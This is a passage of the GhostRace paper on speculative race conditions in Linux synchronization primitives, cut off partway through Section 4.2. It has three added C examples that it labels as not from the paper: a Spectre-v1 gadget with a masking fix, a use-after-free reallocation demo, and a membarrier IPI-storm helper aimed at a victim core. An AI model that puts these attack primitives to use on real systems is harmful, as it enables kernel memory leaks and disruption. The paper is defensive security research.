This paper is included in the Proceedings of the
33rd USENIX Security Symposium.
August 14–16, 2024 • Philadelphia, PA, USA
978-1-939133-44-1
Open access to the Proceedings of the
33rd USENIX Security Symposium
is sponsored by USENIX.

GhostRace: Exploiting and Mitigating Speculative Race Conditions

Hany Ragab, Vrije Universiteit Amsterdam; Andrea Mambretti and Anil Kurmus,
IBM Research Europe - Zurich; Cristiano Giuffrida, Vrije Universiteit Amsterdam
https://www.usenix.org/conference/usenixsecurity24/presentation/ragab
GhostRace: Exploiting and Mitigating Speculative Race Conditions

Hany Ragab†∗
Andrea Mambretti∗ (amb@zurich.ibm.com)
Anil Kurmus∗ (kur@zurich.ibm.com)
Cristiano Giuffrida†

†Vrije Universiteit Amsterdam, Amsterdam, The Netherlands
∗IBM Research Europe, Zurich, Switzerland
Abstract

Race conditions arise when multiple threads attempt to access a shared resource without proper synchronization, often leading to vulnerabilities such as concurrent use-after-free. To mitigate their occurrence, operating systems rely on synchronization primitives such as mutexes, spinlocks, etc.

In this paper, we present GhostRace, the first security analysis of these primitives on speculatively executed code paths. Our key finding is that all the common synchronization primitives can be microarchitecturally bypassed on speculative paths, turning all architecturally race-free critical regions into Speculative Race Conditions (SRCs). To study the severity of SRCs, we focus on Speculative Concurrent Use-After-Free (SCUAF) and uncover 1,283 potentially exploitable gadgets in the Linux kernel. Moreover, we demonstrate that SCUAF information disclosure attacks against the kernel are not only practical, but that their reliability can closely match that of traditional Spectre attacks, with our proof of concept leaking kernel memory at 12 KB/s. Crucially, we develop a new technique to create an unbounded race window, accommodating an arbitrary number of SCUAF invocations required by an end-to-end attack in a single race window. To address the new attack surface, we also propose a generic SRC mitigation to harden all the affected synchronization primitives on Linux. Our mitigation requires minimal kernel changes and incurs only ≈5% geomean performance overhead on LMBench.

"There's security, and then there's just being ridiculous."
– Linus Torvalds, on Speculative Race Conditions
1 Introduction

Since the discovery of Spectre [45], security researchers have been scrambling to locate all the exploitable snippets or gadgets in victim software. Particularly insidious is the first Spectre variant (exploiting conditional branch misprediction [45]), since any victim code path guarded by a source if statement may result in a gadget. To identify practical Spectre-v1 gadgets, previous research has focused on speculative memory safety vulnerabilities [42,45,53], use-after-free [41], and type confusion [41]. However, much less attention has been devoted to other classes of (normally architectural) software bugs, such as concurrency bugs.

∗This work was partially done at IBM Research, Zurich, Switzerland.

To avoid (or at least reduce) concurrency bugs, modern operating systems allow threads to safely access shared memory by means of synchronization primitives, such as mutexes and spinlocks. In the absence of such primitives, e.g., due to a software bug, critical regions would not be properly guarded to enforce mutual exclusion and race conditions would arise. While much prior work has focused on characterizing and facilitating the architectural exploitation of race conditions [49], very little is known about their prevalence on transiently executed code paths. To shed light on the matter, in this paper we ask the following research questions:

"How do synchronization primitives behave during speculative execution? And what are the security implications for modern operating systems?"

To answer these questions, we analyze the implementation of common synchronization primitives in the Linux kernel. Our key finding is that all the common (write-side) primitives (i) lack explicit serialization and (ii) guard the critical region with a conditional branch. As a result, in an adversarial speculative execution environment, i.e., with a Spectre attacker mistraining the conditional branch, these primitives essentially behave like a no-op. The security implications are significant, as an attacker can speculatively execute all the critical regions in victim software with no synchronization.

Building on this finding, we present GhostRace, the first systematic analysis of Speculative Race Conditions (SRCs), a new class of speculative execution vulnerabilities affecting all common synchronization primitives. SRCs are pervasive, as an attacker can turn arbitrary (architecturally) race-free code into race conditions exploitable on a speculative path: in fact, one originating from the synchronization primitives' conditional branch itself. While the effects of SRCs are not visible at the architectural level (e.g., no crashes or deadlocks), due to the transient nature of speculative execution, a Spectre attacker can still observe their microarchitectural effects via side channels. As a result, any SRC breaking security invariants can ultimately lead to Spectre gadgets disclosing victim data to the attacker. To investigate the practical security impact of SRCs, we focus on Speculative Concurrent Use-After-Free (SCUAF), a subclass of speculative race conditions which concerns all critical regions which, once speculatively executed, can expose Use-After-Free (UAF) vulnerabilities.

USENIX Association 33rd USENIX Security Symposium 6185

To investigate the resulting attack surface, we first present new techniques to exploit SCUAF in practice. SCUAF exploitation carries with it all the exploitation challenges of Spectre as well as those of architectural race conditions. The latter alone is far from trivial, as reliable exploitation relies on controlling and stretching the race window for the exploit [49]. Nonetheless, architectural exploits are typically one-shot, i.e., with a single iteration of a (e.g., UAF) primitive and thus a single (successful) race window. Spectre exploits, in turn, typically require thousands or millions of iterations to scan memory looking for the secret to leak [27]. As such, with existing race window-stretching techniques [49], we would need to win the race an overwhelming number of times, hindering practical exploitation. To address this challenge, we propose a new (architectural or speculative) UAF race window-massaging technique to (i) surgically interrupt the victim thread at the "right time" and (ii) create an unbounded window. Our technique builds on and extends existing timer interrupt-based techniques [81] to not only make SCUAF attacks realistic, but accommodate a full end-to-end speculative information disclosure attack in a single race window.

Second, to investigate the extent of the problem, we present a SCUAF gadget scanner and apply it to the Linux kernel to find 1,283 potentially vulnerable gadgets. By manually reaching one of our identified (device-specific) gadgets, we implement a Proof of Concept (PoC) which triggers a concurrent UAF on a speculative path to hijack the control flow to a disclosure gadget in the kernel, allowing an unprivileged attacker to leak arbitrary kernel memory at the rate of 12 KB/s.

Finally, we present a mitigation to serialize the execution of all the vulnerable synchronization primitives. Our mitigation has general applicability and can completely close the attack surface of not only SCUAF but SRC in general. Moreover, it requires minimal kernel changes and incurs low performance overhead (≈5% geomean on LMBench).
Contributions. We make the following contributions:

1. We present a new exploitation technique to precisely interrupt any (kernel) thread and create an architecturally unbounded UAF exploitation window (Section 4.1).
2. We present Speculative Race Conditions (SRCs), a new class of speculative execution vulnerabilities affecting all common synchronization primitives (Section 4.2).
3. We study the security implications of SRCs on architecturally race-free critical regions in the Linux kernel, demonstrating a Proof of Concept exploiting a Speculative Concurrent UAF (SCUAF) and leaking arbitrary kernel memory at a rate of 12 KB/s (Section 4.3).
4. We propose a gadget scanner to find 1,283 potentially vulnerable SCUAF gadgets in the kernel (Section 5).
5. We propose a generic mitigation to harden synchronization primitives against SRC, with a ≈5% geomean performance overhead on LMBench (Section 6).

The PoC code, the gadget scanner, and additional information are publicly available at https://www.vusec.net/projects/ghostrace.
2 Background

2.1 Transient Execution

Figure 1: An example of Spectre bounds check bypass. The conditional branch (in red) with the attacker-controlled x speculatively bypassing the comparison with array1_size, the first speculative load reading a secret byte at address (array1 + x) (in blue), and the second speculative load referencing the CPU cache with a secret-dependent address (in orange).

Since 2018, after the discovery of Spectre [45] and Meltdown [50], transient execution attacks have become an intensively studied area of research. Whenever a modern CPU implements speculative optimizations (e.g., branch prediction), it speculatively executes a sequence of instructions. The two possible outcomes for these instructions are that either they are committed and made visible to the architectural level or they are squashed due to misspeculation (e.g., misprediction), leading to transient execution. When the instructions are squashed, the CPU rolls back the state. Despite the rollback, some microarchitectural side effects are left and can be observed through one of the many side channels available (e.g., data cache [21,29,76,77], branch target buffer [52], port contention [12], etc.) to leak sensitive information.

Spectre-PHT, also known as Spectre-v1, is the first known attack of this kind, targeting the pattern history table and exploiting a code pattern such as the one shown in Figure 1. As shown in the figure, the code checks for x to be in-bound before performing a double array access. For exploitation purposes, the attacker can ensure x is out-of-bound and array1_size is not present in the cache. In this scenario, instead of waiting for array1_size to be loaded from main memory to perform the comparison, the CPU speculates and starts to transiently execute the instructions beyond the comparison. If the comparison has been executed several times before with x in-bound, the CPU is prone to speculate that x is once again in-bound, hence transiently performing the out-of-bound access to array1. When the not cached array2 is accessed using the byte retrieved from the out-of-bound access to array1, the specific accessed location is loaded into the cache. The attacker can complete the 1 byte leak by testing which location of array2 can be accessed faster than the others. Its position within the buffer reveals the secret byte value.

Notably, Spectre-PHT remains unmitigated in hardware. Software developers remain responsible for hardening potentially vulnerable branches with mitigations (e.g., fencing to prevent speculation), but the extent to which all the "right" branches have been adequately hardened in large high-value codebases such as the Linux kernel remains an open question.
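The gadget shape of Figure 1 next to the hardening the kernel applies to such branches, as an added example that is not code from the paper: the unhardened gadget keeps only the bounds-check branch between the attacker-controlled index and the two loads, while the hardened variant clamps the index with a branch-free mask modeled on the Linux generic array_index_mask_nospec() (my own reimplementation, not the kernel's source). The arrays and their fill values are constructed here so the results are checkable; the example shows the code pattern and the clamp, not the timing-based leak itself.

```c
#include <stddef.h>
#include <stdint.h>

#define ARRAY1_SIZE 16
#define LINE 64                       /* probe stride: one cache line per byte value */

static uint8_t array1[ARRAY1_SIZE];   /* the bounds-checked array of Figure 1 */
static uint8_t array2[256 * LINE];    /* the probe buffer indexed by the loaded byte */

/* Constructed fill so results are checkable: array1[i] = i + 1 and
 * array2[v * LINE] = v, so a gadget that loads array1[x] returns x + 1. */
void setup_arrays(void)
{
    for (size_t i = 0; i < ARRAY1_SIZE; i++)
        array1[i] = (uint8_t)(i + 1);
    for (size_t v = 0; v < 256; v++)
        array2[v * LINE] = (uint8_t)v;
}

/* The unhardened gadget of Figure 1: only the branch protects the two loads.
 * On a mispredicted path with x >= ARRAY1_SIZE, array1[x] is read out of
 * bounds and the byte selects which line of array2 gets cached. */
uint8_t victim_gadget(size_t x)
{
    if (x < ARRAY1_SIZE)
        return array2[array1[x] * LINE];
    return 0;
}

/* Branch-free mask: all ones when index < size, zero otherwise. Because no
 * branch is involved, the value is right even while the CPU is speculating
 * past a mispredicted bounds check. */
size_t array_index_mask_nospec(size_t index, size_t size)
{
    __asm__ __volatile__("" : "+r"(index));   /* keep the compiler from folding the mask away */
    return (size_t)(~(long)(index | (size - 1UL - index)) >> (sizeof(long) * 8 - 1));
}

size_t array_index_nospec(size_t index, size_t size)
{
    return index & array_index_mask_nospec(index, size);
}

/* Hardened gadget: after the check, the index is masked, so a transient
 * execution of the body with an out-of-bound x loads array1[0] at most. */
uint8_t victim_gadget_hardened(size_t x)
{
    if (x < ARRAY1_SIZE) {
        x = array_index_nospec(x, ARRAY1_SIZE);
        return array2[array1[x] * LINE];
    }
    return 0;
}
```

The mask works because size - 1 - index underflows exactly when index is out of range, setting the top bit; the complement and arithmetic shift turn that into an all-zero or all-one word. The kernel's x86 version computes the same mask with cmp/sbb; either way the point is that the clamp does not depend on the branch outcome, which is what makes it safe under misprediction. A quick check that the compiler kept the masking is to look for the and/sbb sequence in the disassembly of the hardened function.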
2.2 Concurrency Bugs

Concurrency bugs are a category of bugs which affect multithreaded programs and occur due to the absence or the incorrect use of synchronization primitives. Due to their non-deterministic behavior, concurrency bugs are one of the most elusive and difficult to triage classes of bugs. Under certain conditions, concurrency bugs can also lead to memory error vulnerabilities. In modern operating systems such as the Linux kernel, one of the most common memory error vulnerabilities caused by concurrency bugs is Use-After-Free (UAF).

In a UAF attack, the first step is generally to free a memory object. This operation invalidates all the pointers to that object, which become dangling. The second step generally involves forcing the allocator to reuse the memory slot of the freed object for the allocation of a new object. This step reinitializes the previously freed memory slot. The final step of the attack is generally to force the victim to use one of the dangling pointers, which now points to the newly allocated object. A read from or write to such a pointer to controlled data can be used to exploit the bug in a variety of ways. An example illustrated in Figure 2 is for instance to mount a control-flow hijacking attack via a dangling function pointer.

When this attack is performed in concurrency settings, the free step and the use step are executed by distinct threads sharing the underlying object. Such a concurrent use-after-free vulnerability is harder to exploit than the single-threaded UAF case, since exploitation depends on thread interleaving and the availability of a sufficient race window [49]. While the community has invested significant effort in investigating traditional concurrency bugs and concurrent UAF (e.g., studies demonstrating that more than 40% of the UAF vulnerabilities patched in Linux kernel drivers are concurrent UAF [9]), their microarchitectural properties have largely been neglected. In this paper, we study such properties and their security implications for the first time, uncovering a new class of speculative execution vulnerabilities in the process.

Figure 2: Object reallocation in a UAF attack. First, the victim allocates a heap object which is subsequently freed (steps 1 and 2). Then, the attacker forces the allocation of an object reusing the memory slot of the victim's object, taking control of the data referenced by the dangling pointer (step 3). Finally, the dangling pointer is dereferenced, ultimately allowing the attacker to hijack control flow (step 4).
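The four steps of Figure 2 modeled in user space, as an added example that is not code from the paper: rather than depending on a particular libc allocator, a small fixed-size slot allocator with a LIFO free list (assumed here as a stand-in for a kernel slab cache) makes the slot reuse deterministic. The victim object is shaped like the paper's struct hci_msg; the attacker object, the callbacks and the slab are constructed for the example. A second routine runs the same steps with the reference cleared before the free, the ordering that leaves nothing for step 4 to dereference.

```c
#include <stddef.h>
#include <stdint.h>

#define SLOT_SIZE 32
#define NSLOTS    4

/* Constructed slab: NSLOTS fixed-size slots and a LIFO free list, so the slot
 * freed last is the next one handed out (as a per-CPU slab freelist would). */
static uint8_t slab[NSLOTS][SLOT_SIZE];
static void   *freelist[NSLOTS];
static int     nfree;

static void slab_init(void)
{
    nfree = 0;
    for (int i = NSLOTS - 1; i >= 0; i--)
        freelist[nfree++] = slab[i];
}
static void *slab_alloc(void) { return nfree ? freelist[--nfree] : NULL; }
static void  slab_free(void *p) { freelist[nfree++] = p; }   /* callers' pointers now dangle */

/* Victim object, shaped like the paper's struct hci_msg. */
struct hci_msg {
    void (*cb)(void *ctx, int err);
    void *cb_context;
};

/* Attacker-controlled object of the same size class (step 3). */
struct attacker_obj {
    void (*fake_cb)(void *ctx, int err);
    void *fake_ctx;
};

static int victim_cb_calls, attacker_cb_calls;
static void victim_cb(void *ctx, int err)   { (void)ctx; (void)err; victim_cb_calls++; }
static void attacker_cb(void *ctx, int err) { (void)ctx; (void)err; attacker_cb_calls++; }

/* Steps 1-4 of Figure 2. Returns 1 if the victim's dangling pointer dispatched
 * to the attacker's callback (control-flow hijack), 0 otherwise. */
int uaf_reallocation_demo(void)
{
    slab_init();
    victim_cb_calls = attacker_cb_calls = 0;

    /* Step 1: the victim allocates a message; a second reference keeps pointing
     * at it (the role hdev->cmd_pending_msg plays in the NFC gadget). */
    struct hci_msg *msg = slab_alloc();
    msg->cb = victim_cb;
    msg->cb_context = NULL;
    struct hci_msg *pending = msg;

    /* Step 2: the message is freed; `pending` is now dangling. */
    slab_free(msg);

    /* Step 3: the attacker allocates from the same size class and gets the slot back. */
    struct attacker_obj *fake = slab_alloc();
    if ((void *)fake != (void *)pending)
        return 0;
    fake->fake_cb  = attacker_cb;
    fake->fake_ctx = NULL;

    /* Step 4: the victim's use of the dangling pointer reads attacker data. */
    if (pending->cb)
        pending->cb(pending->cb_context, -1);

    return attacker_cb_calls == 1 && victim_cb_calls == 0;
}

/* Same sequence, but the reference is cleared before the free and checked
 * before use. Returns 1 if neither callback was reached through it. */
int uaf_reallocation_demo_cleared(void)
{
    slab_init();
    victim_cb_calls = attacker_cb_calls = 0;

    struct hci_msg *msg = slab_alloc();
    msg->cb = victim_cb;
    msg->cb_context = NULL;
    struct hci_msg *pending = msg;

    pending = NULL;                 /* drop the shared reference first ... */
    slab_free(msg);                 /* ... then free the object */

    struct attacker_obj *fake = slab_alloc();   /* attacker still gets the slot */
    fake->fake_cb  = attacker_cb;
    fake->fake_ctx = NULL;

    if (pending && pending->cb)     /* nothing left to dispatch through */
        pending->cb(pending->cb_context, -1);

    return attacker_cb_calls == 0 && victim_cb_calls == 0;
}
```

The hijack in the first routine needs only that the attacker's allocation lands in the freed slot and that the victim dereferences the stale pointer afterwards; no memory corruption beyond the reuse is involved, which is why UAF gadgets of this shape escalate so directly to control-flow hijacking. The second routine is the architectural fix for the window between free and pointer update that Section 4 turns into challenge C1; as Section 4.2 shows, it does not by itself help against a speculative entry into the critical region.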
3 Definitions and Threat Model

3.1 Definitions

A traditional data race entails two threads accessing the same memory location, with one thread performing a write and no synchronization primitive protecting the shared accesses. The data race is referred to as a race condition when it impacts the correctness of the program. We define that a Speculative Race Condition (SRC) occurs when two threads access the same memory location, with one thread performing an architectural write operation and another a transient access, with an impact on the correctness of the speculatively executed program. Intuitively, the synchronization primitive, such as exclusive locking, can be bypassed by one of the two threads due to speculative execution. Due to their security impact, we specifically focus on Speculative Concurrent Use-After-Free (SCUAF), the SRC equivalent of traditional concurrent use-after-free [49]. Intuitively, because concurrent use-after-frees are often escalated to control-flow hijacking [49], SCUAFs are also likely to be escalated to speculative control-flow hijacking, a powerful speculative execution primitive [45].

Figure 3: The NFC gadget (net/nfc/hci/core.c:78) found by our scanner and the three main challenges to mount an end-to-end GhostRace attack. Thread 1 and Thread 2 both execute the same function on the shared nfc_hci_dev; C1 marks the window between kfree and the NULL update, C2 the speculative entry into the critical region, and C3 the end-to-end attack built on them.

    /* Shared data */
    struct nfc_hci_dev {
        ...
        struct mutex msg_tx_mutex;
        struct hci_msg *cmd_pending_msg;
        ...
    };
    struct hci_msg {
        ...
        void (*cb)(...);
        void *cb_context;
        ...
    };

    /* Executed by both Thread 1 (Free) and Thread 2 (Use) */
     1  nfc_hci_msg_tx_work(hdev) {
     2      ...
     3      mutex_lock(&hdev->msg_tx_mutex);
     4      if (hdev->cmd_pending_msg->cb) {
     5          hdev->cmd_pending_msg->cb(
     6              hdev->cmd_pending_msg->cb_context,
     7              NULL, -ETIME);
     8      }
     9      kfree(hdev->cmd_pending_msg);
    10      hdev->cmd_pending_msg = NULL;
    11      ...
    12      mutex_unlock(&hdev->msg_tx_mutex);
    13  }

3.2 Threat Model

We consider a typical cross-domain Spectre threat model, with a local unprivileged attacker able to issue system calls to the victim kernel. The attacker seeks to leak arbitrary kernel data by exploiting a speculative race condition in an otherwise architecturally race-free critical region in the kernel. We assume state-of-the-art mitigations against transient execution attacks are all enabled and other classes of (e.g., software) bugs are out of scope, for instance, subject to orthogonal mitigations. Hereafter, without loss of generality, we specifically focus on the Linux kernel running on Intel x86-64.
4 GhostRace Attacks

The goal of a GhostRace attack is to disclose arbitrary kernel data by exploiting a speculative race condition in an otherwise architecturally race-free critical region. To illustrate the workings of an attack, we use one of the gadgets found in Linux kernel 5.15.83 by our gadget scanner (net/nfc/hci/core.c:78) as a running example. Figure 3 depicts two threads both executing the gadget, at the core of the nfc_hci_msg_tx_work function. This function serves as part of the implementation of the Host Controller Interface (HCI) layer of the Near Field Communication (NFC) driver core of the Linux kernel and processes pending messages for the NFC device. As we do not have the required NFC hardware to natively execute this function, we added a system call to reach this code path during our analysis.

The function contains a critical region (i.e., our gadget) operating on the nfc_hci_dev hdev device and performing the following operations. First, it locks the msg_tx_mutex mutex to gain exclusive access to the device and enter the critical region. Second, it checks whether the pending hci_msg hdev->cmd_pending_msg command message to process has a callback set. If so, the callback is invoked via the hdev->cmd_pending_msg->cb function pointer. Third, it frees the memory backing the command message and sets the now-dangling hdev->cmd_pending_msg pointer to NULL. Lastly, it exits the critical region by releasing the mutex.

Since the critical region can be concurrently accessed by different user processes/threads sharing the NFC device, it is crucial for the mutex to guard the region, enforcing mutually exclusive access to the device and ruling out any race conditions. Indeed, absent the mutex, the code in question would be vulnerable to a concurrent Use-After-Free (UAF) vulnerability: as Thread 1 executes the Free code (in bold green), between the kfree of the hdev->cmd_pending_msg pointer and the NULL update of the pointer, Thread 2 may execute the Use code (in bold red) and invoke the hdev->cmd_pending_msg->cb callback of the pending message which was just freed. An attacker able to control memory reuse can then trigger the Use with a controlled callback value and escalate the vulnerability to control-flow hijacking. Luckily, thanks to mutexes and other synchronization primitives offered by modern operating systems such as the Linux kernel (spin locks, RW locks, etc.), architectural exploitation of such race-free code is infeasible.

Unfortunately, as we will show, the same does not apply in the speculative domain, where architecturally race-free execution can still be (microarchitecturally) subject to SRCs. Specifically, in our GhostRace attack, we exploit the NFC gadget to craft a SCUAF primitive and ultimately disclose data, with Thread 1 architecturally executing its critical region, i.e., an architectural Free, and Thread 2 concurrently being speculatively executed, i.e., a speculative Use. Moreover, we need to ensure that Thread 1 is interrupted immediately after the Free, with a sufficiently large race window (or UAF exploitation window) for practical exploitation. Finally, we need to invoke our SCUAF primitive several times to mount end-to-end speculative information disclosure attacks.

In other words, to mount GhostRace attacks, we need to address the following challenges highlighted in Figure 3:

C1 Create a large, ideally unbounded, architectural UAF exploitation window between kfree and the NULL hdev->cmd_pending_msg pointer update to accommodate as many SCUAF primitive invocations as possible.

C2 Turn our architecturally race-free gadget into a speculative race condition, crafting a SCUAF primitive speculatively dereferencing the (dangling) hdev->cmd_pending_msg->cb function pointer.

C3 Use the building blocks above to mount end-to-end information disclosure attacks against the kernel.
4.1 Creating an Unbounded UAF Window

To address C1, we need a strategy to interrupt an arbitrary thread in the Linux kernel for a large and ideally unbounded period of time. We can then use this strategy to create an architecturally unbounded UAF window in the victim Thread 1 for the attacker Thread 2 to exploit. Our case study is particularly challenging as the "original" UAF exploitation window is very small: the attacker must be able to use the hdev->cmd_pending_msg pointer (at line 5 in Thread 2) after the hci_msg memory object is freed (line 9 in Thread 1) and before the pointer is nullified (line 10 in Thread 1). In other words, the time between kfree freeing the object and the NULL update of the hdev->cmd_pending_msg pointer is the only span Thread 2 could exploit to craft a UAF primitive.

Figure 4: From an eight-instruction-wide to an unbounded architectural Use-After-Free exploitation window. Steps 1 and 6 run in user mode, issuing syscalls to trigger the relevant kernel code. The other steps run in kernel mode.

A Tiny Window. To precisely quantify the original UAF exploitation window, one can inspect the implementation of kfree. As shown in Figure 4, under the hood, the default (__slab_free) implementation frees the object (list_del) and then releases an interrupt-safe spinlock (_raw_spin_unlock_irqrestore) immediately before returning control to the caller. Since such a spinlock runs with interrupts disabled (i.e., the CPU cannot be interrupted), the original (interruptible) UAF exploitation window is as tiny as eight instructions, accounting for the time between spinlock release and the NULL pointer update at line 10. To stretch such a tiny window, we can build on existing interrupt-driven techniques [49,81]. Nonetheless, this is challenging as such techniques were not designed to produce race windows that would reliably accommodate several UAF invocations. Moreover, other techniques relying on a high-priority user thread to preempt the victim kernel execution [34] are not applicable to stock kernels, which run with preemption off by default (i.e., CONFIG_PREEMPT unset).

From Tiny to Unbounded. To address these issues, we propose a new strategy based on a combination of techniques. First, drawing from the timerfd-based technique proposed in [81], we rely on high-precision hardware timers [26] to interrupt the victim thread at the right time and slightly amplify the original UAF window. Note that, in our setting, the original timerfd-based technique [81] becomes more effective, since we can exploit the interrupt-disabled behavior of kfree to more precisely interrupt the victim thread at the right time. Second, we rely on user interfaces to trigger an inter-processor interrupt (IPI) storm to (less precisely) interrupt the victim thread in the amplified window and stretch such window indefinitely. This is possible since the victim CPU is stuck handling IPIs until the attacker so wishes. Figure 4 illustrates the steps of our strategy.

As shown in the figure, the attack starts with (1) the attacker scheduling a high-precision hardware timer [26] on a victim core. The attacker calibrates the timer to expire at some point in the future, at nanosecond resolution. Next, (2) the attacker starts a victim (i.e., Free) thread on the same core, which issues a system call to reach the target gadget and thus the victim kfree invocation. Next, (3) kfree acquires the interrupt-safe spinlock and completes the freeing of the victim memory object within uninterruptible execution. Next, (4) kfree releases the spinlock and resumes interruptible execution. At this point, as long as the timer already expired during uninterruptible execution, (5) the victim gets immediately interrupted at the start of the interruptible UAF window. Indeed, when the timer expires, the hardware raises an interrupt, but its actual delivery gets delayed until interrupts are enabled again (i.e., upon spinlock release). In other words,
Figure 5: Size of the UAF exploitation window vs. number of IPI storming cores targeting the victim core. The size of the exploitation window is measured in number of getpid syscalls (a standard benchmark to evaluate generic round trips to the kernel [11]) that attackers can run before the victim core handles all incoming membarrier IPIs and updates the dangling hdev->cmd_pending_msg pointer to NULL. The experiment is performed on a commodity client Intel 12th-generation i9-12900K CPU, which has 16 cores and 24 Simultaneous Multithreads (SMTs). We observe that only 15 SMTs are sufficient to obtain an unbounded UAF exploitation window. We also observe that the location of the IPI storming cores matters [23,57], as the physically closer a storming core is to the victim core, the higher the IPI throughput due to the lower latency on the interconnect. This explains the big increase from 10 to 12 and from 12 to 15 SMTs, as the storming cores added in both experiments were physically the closest to the victim core among all available cores.
even with imprecise timer calibration or jitter, the attacker has significant chances to interrupt the victim at precisely the right time. It is, in fact, sufficient to cause the timer to expire any time within the core (uninterruptible) execution of kfree, rather than in the original tiny eight-instruction UAF window. Put differently, the interrupt-disabled behavior of kfree ultimately helps rather than hinders the attack.

When the timer interrupt gets delivered, kernel execution switches from the victim thread to the timer interrupt handler. The latter is normally short-lived, but one can amplify the window by registering several timer observers, e.g., via timerfd support. Still, while this strategy can interrupt the victim thread at the right time and amplify the original UAF window, the latter is still insufficient to accommodate many SCUAF primitive invocations. However, the amplified window is sufficient for the attacker to interrupt the timer interrupt handler with a more jittery Inter-Processor Interrupt (IPI) sent by another core. Building on this intuition, (6) the attacker schedules on the remaining cores storming threads that constantly send IPIs to the victim core. For this purpose, the membarrier system call's MEMBARRIER_CMD_PRIVATE_EXPEDITED_RSEQ IPI is ideal, since, unlike other IPIs used by previous work [49], its delivery can be triggered via a low-latency system call targeting a single (victim) core. The resulting IPI storm not only causes the timer interrupt handler to be interrupted, but completely overwhelms the victim core. Figure 5 relates the size of the UAF exploitation window to an increasing number of storming cores on our test platform, with 15 SMTs being sufficient to overwhelm the victim. Indeed, (7) the victim core is forced to constantly handle an indefinite number of MEMBARRIER IPIs, effectively creating an architecturally unbounded UAF exploitation window to mount an arbitrarily long end-to-end attack. Finally, once the attack completes, the attacker terminates the storming threads, (8) victim thread execution resumes, and only then is the dangling hdev->cmd_pending_msg pointer updated to NULL. Note that, between steps 7 and 8, the attacker may execute a speculative execution attack as many times as they wish, given the unbounded window. This means the steps 1 to 8 here to create the unbounded exploitation window only need to succeed once for the attacker to be able to leak as many bytes as desired.

Figure 6: Top part: The core implementation of the mutex_lock synchronization primitive, with the conditional branch which can be abused to craft SRCs in red. Bottom part: The branch ultimately checks the outcome of the lock cmpxchgq instruction, which does not serialize the execution.

    void mutex_lock(struct mutex *lock) {
     1      ...
     2
     3      if (!__mutex_trylock_fast(lock))
     4          if (atomic_long_try_cmpxchg_acquire(&lock, ...))
     5              return true;
     6      ...
     7  }

    Call Stack:
      atomic_long_try_cmpxchg_acquire(&lock, ...)
      arch_atomic_long_try_cmpxchg_acquire(&lock, ...)
      arch_atomic_try_cmpxchg_acquire(&lock, ...)
      arch_atomic_try_cmpxchg(&lock, ...)
      arch_try_cmpxchg(&lock, ...)
      __raw_try_cmpxchg(ptr, ...) ({
          asm volatile(
              "lock cmpxchgq %2, %1"
              : "=a" (ret), "+m" (*ptr)
              : "r" (new), "0" (old)
              : "memory");
      })
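The IPI-storm building block of step 6 in user space, as an added example that is not the paper's PoC: a thread of our own process is pinned to the target CPU and spins (standing in for the victim Free thread, which in the attack belongs to the same process), while the caller issues membarrier(MEMBARRIER_CMD_PRIVATE_EXPEDITED_RSEQ) with the per-CPU flag, each of which makes the kernel interrupt that CPU as long as one of the process's threads is running there. Assumptions: Linux 5.10 or later (the per-CPU flag), CONFIG_RSEQ, and the uapi command values, which are defined inline so the example builds against older headers; where the kernel refuses, the helper reports the errno instead of storming. The iteration count is bounded so the example is a measurement of the primitive rather than a denial of service.

```c
#include <errno.h>
#include <pthread.h>
#include <stdatomic.h>
#include <unistd.h>
#include <sys/syscall.h>

/* membarrier(2) uapi values (linux/membarrier.h), restated here. */
#define MB_REGISTER_PRIVATE_EXPEDITED_RSEQ (1 << 8)
#define MB_PRIVATE_EXPEDITED_RSEQ          (1 << 7)
#define MB_FLAG_CPU                        (1 << 0)   /* third argument is a CPU id */

static int membarrier_call(int cmd, unsigned int flags, int cpu_id)
{
#ifdef SYS_membarrier
    return (int)syscall(SYS_membarrier, cmd, flags, cpu_id);
#else
    (void)cmd; (void)flags; (void)cpu_id;
    errno = ENOSYS;
    return -1;
#endif
}

/* Pins the calling thread to one CPU through the raw syscall (no cpu_set_t needed). */
static int pin_to_cpu(int cpu)
{
#ifdef SYS_sched_setaffinity
    unsigned long mask[16] = { 0 };
    mask[cpu / (8 * sizeof(unsigned long))] |= 1UL << (cpu % (8 * sizeof(unsigned long)));
    return (int)syscall(SYS_sched_setaffinity, 0, sizeof mask, mask);
#else
    (void)cpu; errno = ENOSYS; return -1;
#endif
}

static atomic_int stop_victim;

/* Stand-in for the victim thread: keeps one of our threads running on
 * victim_cpu so that the targeted membarrier has something to interrupt. */
static void *victim_spin(void *arg)
{
    if (pin_to_cpu(*(int *)arg) == 0)
        while (!atomic_load(&stop_victim))
            ;
    return NULL;
}

struct storm_result { long sent; int err; };

/* Registers the process for private expedited RSEQ membarriers, starts the
 * pinned victim thread, then issues `iters` membarriers aimed at victim_cpu.
 * Returns how many were issued and the errno that stopped the loop (0 if none). */
struct storm_result ipi_storm(int victim_cpu, long iters)
{
    struct storm_result r = { 0, 0 };
    if (membarrier_call(MB_REGISTER_PRIVATE_EXPEDITED_RSEQ, 0, 0) != 0) {
        r.err = errno;
        return r;
    }
    atomic_store(&stop_victim, 0);
    pthread_t victim;
    int e = pthread_create(&victim, NULL, victim_spin, &victim_cpu);
    if (e != 0) {
        r.err = e;
        return r;
    }
    for (long i = 0; i < iters; i++) {
        if (membarrier_call(MB_PRIVATE_EXPEDITED_RSEQ, MB_FLAG_CPU, victim_cpu) != 0) {
            r.err = errno;
            break;
        }
        r.sent++;
    }
    atomic_store(&stop_victim, 1);
    pthread_join(victim, NULL);
    return r;
}
```

Two properties make this command the convenient choice the text describes: the registration step is per process and done once, and the per-CPU flag lets each call address one core, so several storming threads can aim at the same victim core without touching the others. Seen from the defender's side, the same shape (one process issuing membarrier at a sustained high rate with the CPU flag set) is a usable signal for this window-stretching step, which leaves no trace in the victim's own code path.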
4.2 Crafting Speculative Race Conditions

To address C2 and craft speculative race conditions, we turn to the implementation of common synchronization primitives (e.g., mutex, spinlock, etc.). At the architectural level, these primitives guarantee mutual exclusion of critical regions and this is no different for our gadget. However, they offer no microarchitectural guarantees and their behavior is subject to their implementation. To understand their behavior, we investigated the implementation of common synchronization primitives in the Linux kernel. The core implementation of the mutex_lock primitive (Figure 6 top) serves to illustrate. As shown in the figure, line 4 includes a conditional branch that ultimately checks the outcome of the lock cmpxchgq instruction. This instruction atomically compares the current value of the mutex ptr with its old one old and, if identical, the mutex can be locked: the instruction sets the mutex to the new value new and the code grants access to the guarded critical region. Likewise, if the comparison fails, the mutex has been locked by another thread, therefore the code falls through after failing to acquire the mutex.

Figure 7: Transient window size for different write-side synchronization mechanisms, i.e., number of speculative loads that leave an observable microarchitectural trace.

